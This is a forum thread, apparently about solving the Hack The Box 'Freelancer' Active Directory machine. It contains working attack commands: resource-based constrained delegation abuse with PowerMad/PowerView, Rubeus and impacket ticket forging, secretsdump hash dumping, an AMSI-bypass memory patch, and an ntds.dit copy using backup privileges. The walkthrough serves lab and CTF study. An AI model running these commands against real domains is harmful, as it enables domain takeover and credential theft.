[maggi]

I liked the windows hard box from last season better based on Iron man stuff more than the attack on titan hard box; I thought it all lined up with the characters/users better

[osamy7593]

how do i get root from liza?

Bro how to get liza ? U reset her pass ? Or what i'm stuck in lorra

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[ritualist]

Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck

After bypassing AMSI (snippet earlier in this thread), I used bloodhound to collect info about the domain.
Lorra is in the "AD RECYCLE BIN" group which has GenericWrite on the DC computer.
BloodHound describes how to abuse it. This link it gives has a good summary of commands:
https://gist.github.com/HarmJ0y/224dbfef...51e40d52ff
It does not involve restoring deleted files but maybe this is relevant for other paths (?).

Needs PowerView/PowerMad:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

After this we have control of attackersystem$ which also shows as AllowedToAct on the DC machine in BloodHound.
It should be possible to use this either on the shell with Rubeus or directly from the attacker machine.
These are the commands I tried.
Windows:

Invoke-Rubeus "s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:cifs/dc.freelancer.htb /ptt"

It generates a valid ticket that also shows with klist

Cached Tickets: (1)

#0>    Client: Administrator @ FREELANCER.HTB
        Server: cifs/dc.freelancer.htb @ FREELANCER.HTB
...

Unfortunately it doesn't allow me access to the DC share

dir //dc/c$
...
PermissionDenied: (\\dc\c$:String) [Get-ChildItem], UnauthorizedAccessException

I also tried this from Kali:

sudo rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb

(combined with rdata because I kept getting clock skew errors)

It successfully generates a ticket

[*]Saving ticket in Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache

Which I try to abuse with secrets-dump/psexec

KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-psexec freelancer/administrator@dc.freelancer.htb -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.

Unfortunately this also fails in all the variations I have tried.

When either of these are working, we get the admin hash and root.

[daddybird]

try with service ldap, it will work , I just rooted it like an hour ago

[ritualist]

Finally got it working with this in the last step

sudo rdate -n freelancer.htb && KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-secretsdump freelancer/administrator@dc.freelancer.htb -k -no-pass

It was just the clock skew trolling me and giving confusing errors.

Nice machine.

[osamy7593]

Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck

After bypassing AMSI (snippet earlier in this thread), I used bloodhound to collect info about the domain.
Lorra is in the "AD RECYCLE BIN" group which has GenericWrite on the DC computer.
BloodHound describes how to abuse it. This link it gives has a good summary of commands:
https://gist.github.com/HarmJ0y/224dbfef...51e40d52ff
It does not involve restoring deleted files but maybe this is relevant for other paths (?).

Needs PowerView/PowerMad:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

After this we have control of attackersystem$ which also shows as AllowedToAct on the DC machine in BloodHound.
It should be possible to use this either on the shell with Rubeus or directly from the attacker machine.
These are the commands I tried.
Windows:

Invoke-Rubeus "s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:cifs/dc.freelancer.htb /ptt"

It generates a valid ticket that also shows with klist

Cached Tickets: (1)

#0>    Client: Administrator @ FREELANCER.HTB
        Server: cifs/dc.freelancer.htb @ FREELANCER.HTB
...

Unfortunately it doesn't allow me access to the DC share

dir //dc/c$
...
PermissionDenied: (\\dc\c$:String) [Get-ChildItem], UnauthorizedAccessException

I also tried this from Kali:

sudo rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb

(combined with rdata because I kept getting clock skew errors)

It successfully generates a ticket

[*]Saving ticket in Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache

Which I try to abuse with secrets-dump/psexec

KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-psexec freelancer/administrator@dc.freelancer.htb -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.

Unfortunately this also fails in all the variations I have tried.

When either of these are working, we get the admin hash and root.

How did you bypass AMSI?

Bro we should bypass amsi to do what ??

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[imhitt]

Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck

After bypassing AMSI (snippet earlier in this thread), I used bloodhound to collect info about the domain.
Lorra is in the "AD RECYCLE BIN" group which has GenericWrite on the DC computer.
BloodHound describes how to abuse it. This link it gives has a good summary of commands:
https://gist.github.com/HarmJ0y/224dbfef...51e40d52ff
It does not involve restoring deleted files but maybe this is relevant for other paths (?).

Needs PowerView/PowerMad:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

After this we have control of attackersystem$ which also shows as AllowedToAct on the DC machine in BloodHound.
It should be possible to use this either on the shell with Rubeus or directly from the attacker machine.
These are the commands I tried.
Windows:

Invoke-Rubeus "s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:cifs/dc.freelancer.htb /ptt"

It generates a valid ticket that also shows with klist

Cached Tickets: (1)

#0>    Client: Administrator @ FREELANCER.HTB
        Server: cifs/dc.freelancer.htb @ FREELANCER.HTB
...

Unfortunately it doesn't allow me access to the DC share

dir //dc/c$
...
PermissionDenied: (\\dc\c$:String) [Get-ChildItem], UnauthorizedAccessException

I also tried this from Kali:

sudo rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb

(combined with rdata because I kept getting clock skew errors)

It successfully generates a ticket

[*]Saving ticket in Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache

Which I try to abuse with secrets-dump/psexec

KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-psexec freelancer/administrator@dc.freelancer.htb -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.

Unfortunately this also fails in all the variations I have tried.

When either of these are working, we get the admin hash and root.

[*]For me all any manipulations with groups always return something like

The term 'Add-DomainGroupMember' is not recognized as the name of a cmdlet

how did you call them then ?

[j868K3792]

Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck

After bypassing AMSI (snippet earlier in this thread), I used bloodhound to collect info about the domain.
Lorra is in the "AD RECYCLE BIN" group which has GenericWrite on the DC computer.
BloodHound describes how to abuse it. This link it gives has a good summary of commands:
https://gist.github.com/HarmJ0y/224dbfef...51e40d52ff
It does not involve restoring deleted files but maybe this is relevant for other paths (?).

Needs PowerView/PowerMad:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

After this we have control of attackersystem$ which also shows as AllowedToAct on the DC machine in BloodHound.
It should be possible to use this either on the shell with Rubeus or directly from the attacker machine.
These are the commands I tried.
Windows:

Invoke-Rubeus "s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:cifs/dc.freelancer.htb /ptt"

It generates a valid ticket that also shows with klist

Cached Tickets: (1)

#0>    Client: Administrator @ FREELANCER.HTB
        Server: cifs/dc.freelancer.htb @ FREELANCER.HTB
...

Unfortunately it doesn't allow me access to the DC share

dir //dc/c$
...
PermissionDenied: (\\dc\c$:String) [Get-ChildItem], UnauthorizedAccessException

I also tried this from Kali:

sudo rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb

(combined with rdata because I kept getting clock skew errors)

It successfully generates a ticket

[*]Saving ticket in Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache

Which I try to abuse with secrets-dump/psexec

KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-psexec freelancer/administrator@dc.freelancer.htb -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.

Unfortunately this also fails in all the variations I have tried.

When either of these are working, we get the admin hash and root.

How did you bypass AMSI?

Bro we should bypass amsi to do what ??

Upload and run powertools, like mimikatz etc

You can not run any mimikatz or powerview to bypass AMSI cus AMSI will not allow it 

[j868K3792]

How did you bypass AMSI?

Bro we should bypass amsi to do what ??

Upload and run powertools, like mimikatz etc

You can not run any mimikatz or powerview to bypass AMSI cus AMSI will not allow it 

No, I think you get my intention wrong, I want to bypass AMSI to run powertools like how ritualist did it.

Oh yeap sorry, I skiped previous question, thought it was "how to bypass"..
So how to bypass it?

---

I think to bypass AMSI you need:
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

It should copy 0xff to our AMSI object context
BUT

After copy value to memory the previous values is the same.. It was 183...608 and it stay 183...608

UPD: nvm it was pointer

But anyway nothing changes, the object is the same as it was before copy

[jsvensson]

thats where im stuck too

Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

This can give you list of deleted objects.

Then you may call

Restore-ADObject -identity ***(ObjectGUID)***

i used that for each of from previous command and for me it works only for "liza.kazanof" and when i call it again it shows that its already restored. But now am stuck and can not find where it restored and how to use it

So you restore liza.kazanof - this is user in Backup Operators group - with it you could copy SYSTEM ntds.dit and use secretsdump. There is in forum password for user liza.k it could be sprayed for liza.kazanof as i think this is the same "person".

It perfectly works. But how to copy ntds.dit file ? shadow volume does not work and liza.kazanof has no read permission

liza.kazanof has sebackup and serestore - use diskshadow and robocopy